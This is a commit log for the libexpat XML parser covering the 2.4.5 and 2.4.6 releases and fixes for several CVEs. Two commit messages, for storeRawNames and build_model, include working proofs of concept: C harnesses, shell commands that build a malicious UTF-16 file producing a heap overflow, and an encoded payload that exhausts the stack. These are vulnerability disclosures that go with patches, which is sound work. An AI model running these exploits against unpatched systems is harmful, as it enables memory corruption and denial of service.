Commit Graph

3507 Commits

Author SHA1 Message Date
Sebastian Pipping
9579f7ea29 Changes: Document #572 and #577 2022-03-04 16:56:22 +01:00
Sebastian Pipping
c57bea96b7 lib|doc: Add a note on namespace URI validation 2022-03-04 16:56:22 +01:00
Sebastian Pipping
5dd5218297 lib: Document namespace separator effect right in header <expat.h> 2022-03-04 16:54:01 +01:00
Sebastian Pipping
e0f852db1e tests: Cover relaxed fix to CVE-2022-25236 2022-03-04 16:54:01 +01:00
Sebastian Pipping
2ba6c76fca lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters 2022-03-04 16:54:01 +01:00
Sebastian Pipping
c99e0e7f2b
Merge pull request #579 from Tieske/patch-1
doc: Fix documentation of XML_EndDoctypeDeclHandler in <expat.h>
2022-03-04 16:46:36 +01:00
Thijs Schreijer
7abe5549cb
fix typo
This has already been corrected in the official API reference docs
2022-03-04 11:24:31 +01:00
Thijs Schreijer
80553ff825
doc: Document that a call to XML_FreeContentModel can be done at a later time from outside the element declaration handler (#575) 2022-03-02 21:33:54 +01:00
Sebastian Pipping
866a8617e4
Merge pull request #574 from libexpat/hardcoded-namespace-uri-findability
lib: Make hardcoded namespace URIs easier to find
2022-02-27 03:49:16 +01:00
Sebastian Pipping
92527164e7 lib: Make hardcoded namespace URIs easier to find 2022-02-27 02:42:54 +01:00
Jeffrey Walton
8c4b3aa16f
Update documentation on use of XML_POOR_ENTROPY on Solaris (#573) 2022-02-26 22:00:16 +01:00
Sebastian Pipping
6aa6a82d24
Merge pull request #570 from petitlapin/dll_info
CMake/Windows: store Expat version in the dll
2022-02-24 23:09:09 +01:00
Johnny Jazeix
f294837733 CMake/Windows: store Expat version in the dll
Fixes #555

Tested with msvc2019 and mingw8.1
2022-02-24 22:26:40 +01:00
Sebastian Pipping
ce08faf294
Merge pull request #571 from libexpat/issue-569-resolve-use-of-macros-nan-and-infinity
tests: Resolve use of macros NAN and INFINITY for GNU G++ 4.8.2 (fixes #569)
2022-02-24 00:34:52 +01:00
Sebastian Pipping
f6f5d9bb4c tests: Resolve use of macros NAN and INFINITY for GNU G++ 4.8.2 2022-02-23 22:58:36 +01:00
Sebastian Pipping
65a21f2b2a
Merge pull request #568 from libexpat/issue-567-prepare-release
Prepare release 2.4.6 (part of #567)
2022-02-20 18:01:38 +01:00
Sebastian Pipping
400e6955ff Set expected release date for 2.4.6 2022-02-20 16:09:26 +01:00
Sebastian Pipping
28f74546b4 Bump version to 2.4.6 2022-02-20 16:09:26 +01:00
Sebastian Pipping
45732df416 Bump version info from 9:5:8 to 9:6:8
See https://verbump.de/ for what these numbers do
2022-02-20 16:09:26 +01:00
Sebastian Pipping
49abcfba57 Changes: Finalize entry on #566 2022-02-20 16:09:22 +01:00
Sebastian Pipping
9288cd5474
Merge pull request #566 from ferivoz/model-regression
Fix build_model regression
2022-02-20 15:57:54 +01:00
Sebastian Pipping
2722201a5b Changes: Document regression from CVE-2022-25313 fix 2022-02-20 11:55:54 +00:00
Sebastian Pipping
154e565f6e tests: Protect against nested element declaration model regressions 2022-02-20 11:55:49 +00:00
Samanta Navarro
b12f34fe32 Fix build_model regression.
The iterative approach in build_model failed to fill children arrays
correctly. A preorder traversal is not required and turned out to be the
culprit. Use an easier algorithm:

Add nodes from scaffold tree starting at index 0 (root) to the target
array whenever children are encountered. This ensures that children
are adjacent to each other. This complies with the recursive version.

Store only the scaffold index in numchildren field to prevent a direct
processing of these children, which would require a recursive solution.
This allows the algorithm to iterate through the target array from start
to end without jumping back and forth, converting on the fly.

Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
2022-02-20 11:55:46 +00:00
Sebastian Pipping
97a4840578
Merge pull request #564 from libexpat/issue-557-prepare-release
Prepare release 2.4.5 (part of #557)
2022-02-18 23:39:29 +01:00
Sebastian Pipping
bacd815ed0 Set expected release date for 2.4.5 2022-02-18 20:17:17 +01:00
Sebastian Pipping
fdbd69b12c Sync file headers 2022-02-18 20:17:16 +01:00
Sebastian Pipping
fa379d65dd Bump version to 2.4.5 2022-02-18 20:17:16 +01:00
Sebastian Pipping
748c618f72 Bump version info from 9:4:8 to 9:5:8
See https://verbump.de/ for what these numbers do
2022-02-18 20:14:29 +01:00
Sebastian Pipping
e2d43320ce Changes: Document #558 #559 #560 2022-02-18 20:14:29 +01:00
Sebastian Pipping
306b72134f
Merge pull request #562 from libexpat/utf8-security
[CVE-2022-25235] lib: Protect against malformed encoding (e.g. malformed UTF-8)
2022-02-18 20:12:32 +01:00
Sebastian Pipping
c16300f0bc Changes: Document CVE-2022-25235 2022-02-18 18:04:27 +01:00
Sebastian Pipping
6a5510bc6b tests: Cover missing validation of encoding (CVE-2022-25235) 2022-02-18 18:02:19 +01:00
Sebastian Pipping
c85a3025e7 lib: Add comments to BT_LEAD* cases where encoding has already been validated 2022-02-18 18:02:19 +01:00
Sebastian Pipping
3f0a0cb644 lib: Add missing validation of encoding (CVE-2022-25235) 2022-02-18 18:02:19 +01:00
Sebastian Pipping
ee2a5b50e7 lib: Drop unused macro UTF8_GET_NAMING 2022-02-18 18:02:19 +01:00
Sebastian Pipping
2cc97e875e
Merge pull request #561 from libexpat/namesep-security
[CVE-2022-25236] lib: Protect against insertion of namesep characters into namespace URIs
2022-02-18 18:01:27 +01:00
Sebastian Pipping
d477fdd284
Merge pull request #560 from ferivoz/copy
[CVE-2022-25314] lib: Prevent integer overflow in copyString
2022-02-18 18:00:46 +01:00
Sebastian Pipping
89214940ef
Merge pull request #559 from ferivoz/rawnames
[CVE-2022-25315] lib: Prevent integer overflow in storeRawNames
2022-02-18 18:00:24 +01:00
Sebastian Pipping
bbdfcfef47
Merge pull request #558 from ferivoz/model
[CVE-2022-25313] lib: Prevent stack exhaustion in build_model
2022-02-18 17:59:50 +01:00
Sebastian Pipping
e4d7e49782 Changes: Document CVE-2022-25236 2022-02-16 02:07:31 +01:00
Sebastian Pipping
2de077423f tests: Cover CVE-2022-25236 2022-02-16 02:07:31 +01:00
Sebastian Pipping
a2fe525e66 lib: Protect against malicious namespace declarations (CVE-2022-25236) 2022-02-16 02:07:19 +01:00
Sebastian Pipping
6881a4fc85 lib: Fix (harmless) use of uninitialized memory 2022-02-16 02:06:23 +01:00
Sebastian Pipping
f1a444ef64
Merge pull request #563 from libexpat/extend-mailmap
Extend .mailmap
2022-02-15 22:43:52 +01:00
Sebastian Pipping
317c91776a Sync file headers 2022-02-15 21:23:29 +01:00
Sebastian Pipping
68ed0d7e63 Extend .mailmap 2022-02-15 21:23:25 +01:00
Samanta Navarro
eb0362808b Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counterparts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
2022-02-15 12:17:18 +00:00
Samanta Navarro
efcb347440 Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
2022-02-15 12:16:57 +00:00
Samanta Navarro
9b4ce651b2 Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.

The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).

Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).

Documentation and readability improvements kindly added by Sebastian.

Proof of Concept:

1. Compile poc binary which parses XML file line by line

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdio.h>
 #include <stdlib.h> /* needed for free() */

 XML_Parser parser;

 static void XMLCALL
 dummy_element_decl_handler(void *userData, const XML_Char *name,
                            XML_Content *model) {
   XML_FreeContentModel(parser, model);
 }

 int main(int argc, char *argv[]) {
   FILE *fp;
   char *p = NULL;
   size_t s = 0;
   ssize_t l;
   if (argc != 2)
     errx(1, "usage: poc poc.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "XML_ParserCreate");
   XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
   if ((fp = fopen(argv[1], "r")) == NULL)
     err(1, "fopen");
   while ((l = getline(&p, &s, fp)) > 0)
     if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
       errx(1, "XML_Parse");
   XML_ParserFree(parser);
   free(p);
   fclose(fp);
   return 0;
 }
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```

2. Create XML file with a lot of nested groups in DTD element

```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```

3. Run Proof of Concept

```
./poc poc.xml
```

Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
2022-02-15 12:16:23 +00:00